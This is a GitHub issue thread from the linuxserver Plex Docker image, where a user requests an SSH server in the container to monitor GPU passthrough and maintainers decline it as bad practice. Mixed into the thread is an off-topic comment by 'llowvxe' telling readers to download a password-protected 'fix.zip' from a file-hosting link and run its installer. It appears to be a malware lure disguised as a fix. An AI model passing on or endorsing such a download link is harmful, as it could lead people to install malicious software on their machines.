### ISSUE TITLE
[FEAT] SSH Server

### ISSUE THREAD

**Issue by OverStyleFR** [linuxserver/docker-plex#401]
### Is this a new feature request?

- [X] I have searched the existing issues

### Wanted change

I want a SSH Server inside the container (because i want to monitoring the Nvidia SMI by Centreon, and for that i need SSH). I don't want to monitor the nvidia SMI of the host because i want to know if the nvidia passthrough the docker is active or not.

### Reason for change

Because i want to monitor the Nvidia SMI of the plex. And if you add SSH Server, maybye other person will do other thing...

### Proposed code change

No propose code, sorry.

**Comment by j0nnymoe** [comment]
We do not have any plans to add an SSH Server to this container nor any other. You're more than welcome to add this yourself via docker mods: https://github.com/linuxserver/docker-mods/tree/universal-package-install .

**Comment by Roxedus** [comment]
Not going to happen.
1. There is better options for executing commands in a container, ie `docker exec`
2. A SSH server in a container is *extremely* bad practice
3. This is very niche, and should be solved with https://www.linuxserver.io/custom

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by OverStyleFR** [comment]
> We do not have any plans to add an SSH Server to this container nor any other. You're more than welcome to add this yourself via docker mods: https://github.com/linuxserver/docker-mods/tree/universal-package-install .

Okay thanks for the response. I try to install openssh-server, but he didn't want to install.
My file :

```
version: "3.3"
services:

  plex:
    image: lscr.io/linuxserver/plex:latest
    container_name: plex
    network_mode: host
    environment:
      - PUID=1000
      - PGID=1000
      - TZ=Europe/Paris
      - VERSION=docker
      - PLEX_CLAIM=
      - NVIDIA_VISIBLE_DEVICES=all
      - DOCKER_MODS=linuxserver/mods:universal-package-install
      - INSTALL_PACKAGES=openssh-server|nano
    volumes:
      - ./application/plex:/config
    restart: always
    ports:
      - 2222:22
    runtime: nvidia
```
